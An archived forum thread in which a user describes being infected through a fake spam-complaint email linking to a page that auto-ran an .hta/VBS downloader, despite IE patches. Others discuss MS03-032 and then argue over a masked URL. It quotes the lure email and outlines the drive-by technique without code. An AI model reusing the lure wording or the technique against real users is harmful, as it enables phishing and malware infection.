Help Needed - New Exploit? Trojan auto-downloaded with latest IE, Norton doesn't recog.

G

Getter

Earlier tonight, I received the following e-mail (edited IP)

---
Hello,

I have received several SPAM emails promoting your services.
Customer service does not seem to care about my complaints,
I hope you take immediate action against this abusive user.

I've put up a copy of the email with complete headers here:
http://64.252.XXX.XXX/abuse.html

Regards,
Alex
---

The web page in question shows a spam e-mail, but then Norton popped
up two windows; one with an embedded script warning, two with
notification that Trojan.Progent had been found on my machine (in the
Temporary Internet Files folders).

After shutting down, I moved the hard drive over to another machine
and did some checking. There's a .hta file in the Temp. Int. Files
directories that Norton does not recognize, but is clearly a trojan.
It's a VBS that downloads a file "systemf.exe" from an FTP site (the
same one the trojan was hosted on). I found systemf.exe on my
machine, confirming that the script did run.

My MSIE is 6.0.2800.1106 _with_ 822925, the most recent security
patch. Norton does not recognize the .hta file or the downloaded
executable.

As you might imagine, I have no idea how much damage has been done (if
any), or, more importantly, how my machine was hit with this. I could
really use some quick advice. Please follow-up to the group, as I
have no mail right now.
 
M

Mal

Getter said:
Earlier tonight, I received the following e-mail (edited IP)

---
Hello,

I have received several SPAM emails promoting your services.
Customer service does not seem to care about my complaints,
I hope you take immediate action against this abusive user.

I've put up a copy of the email with complete headers here:
http://64.252.XXX.XXX/abuse.html

Regards,
Alex
---
Click to expand...

I've seen an increase in the use of this type of thing recently.

Basically you access a webpage and IE will try to download a .hta file
(or if you aren't patched it will download and run the .hta file). This
will then either create a new file on the fly and/or download more files
from the net.

MS03-032 (822925) should patch this vulnerability and not allow the
files to run automatically. It will however cause a "File open/save"
window to appear. There has been an advisory from Microsoft about more
similar issues to the ones patched in MS03-032 that they're
investigating, but apparently (perhaps) they aren't being actively used.

Try sending a copy of the files with a brief description to
(e-mail address removed).
 
N

news-server.houston.rr.com

My system did have that latest IE patch, yet still auto-ran the script which
downloaded the virus/trojan/worm/whatever.

Sent the virus to Symantec/McAfee/Trend Micro, hopefully it'll get a good
once-over and I can find out what damage it caused.

Even following best available security practices, my machine was hit hard
with this thing. Nothing to do now but wait until morning and see if it's
big or not.
 
M

mzlindyone

Earlier tonight, I received the following e-mail (edited IP)

---
Hello,

I have received several SPAM emails promoting your services.
Customer service does not seem to care about my complaints,
I hope you take immediate action against this abusive user.

I've put up a copy of the email with complete headers here:
http://64.252.XXX.XXX/abuse.html

Regards,
Alex
---

The web page in question shows a spam e-mail, but then Norton popped
up two windows; one with an embedded script warning, two with
notification that Trojan.Progent had been found on my machine (in the
Temporary Internet Files folders).

After shutting down, I moved the hard drive over to another machine
and did some checking. There's a .hta file in the Temp. Int. Files
directories that Norton does not recognize, but is clearly a trojan.
It's a VBS that downloads a file "systemf.exe" from an FTP site (the
same one the trojan was hosted on). I found systemf.exe on my
machine, confirming that the script did run.

My MSIE is 6.0.2800.1106 _with_ 822925, the most recent security
patch. Norton does not recognize the .hta file or the downloaded
executable.

As you might imagine, I have no idea how much damage has been done (if
any), or, more importantly, how my machine was hit with this. I could
really use some quick advice. Please follow-up to the group, as I
have no mail right now.
Click to expand...


http://securityresponse.symantec.com/avcenter/venc/data/trojan.progent.html
should get you started at least

Could we have the entire correct URL please? This is Usenet not AOL.


Carol
 
F

FromTheRafters

Roy said:
That link is perfectly correct, complete, and should work with any
browser.

Did you try it before posting?
Click to expand...

With all of those X's, why would anyone expect it to work?

....and no, it doesn't.
 
F

FromTheRafters

Michael Cecil said:
http://securityresponse.symantec.com/avcenter/venc/data/trojan.progent.html
works fine for me. You talking about another URL?
Click to expand...

Yes, the one mzlindyone was requesting that the OP could post since
this is usenet not AOL

http://64.252.xxx.xxx/abuse.html

The one that you just posted is the one that mzlindyone provided.

Roy didn't see the irony in his asking if mzlindyone tried the url
he or she provided in the self same post. I wanted to point out
what I thought mzlindyone must have been referring to.
 
F

FromTheRafters

Roy said:
Thank you, that's the one *I* was talking about too.

At least two of us round here are still sane.....
Click to expand...

Err...but *that* was the one that mzlinyone posted, why would
mzlindyone complain about that one being unuseable?

....well...I guess sanity is a relative term...
 
M

mzlindyone

Err...but *that* was the one that mzlinyone posted, why would
mzlindyone complain about that one being unuseable?
Click to expand...

Quite so.

I hereby promise to take the time in the future to be sure my posts
require no deductive reasoning at all. Ghod forbid anyone should have
to *think*.

Carol
 

Ask a Question

Want to reply to this thread or ask your own question?

You'll need to choose a username for the site, which only take a couple of moments. After that, you can post your question and our members will help you out.

Ask a Question

Similar Threads

Can't see very simple HTML pages with Norton Internet Security!!!!! 43
Norton (NAV 2002) does not detect hotfix.exe as a threat even afterupdate 1
Vista new machine with NO NORTON 4
Computer Associates sells their customer e-mail list to Tiger Direct 14
Help Needed With Removing Virus 32
Please help I can receive but cannot send e-mail with Outlook 2007 5
CPU Always @ 100% running PeoplePC - Norton - IE 6.0.28 7
Norton Antivirus deleted, spam taking over computer 1

Top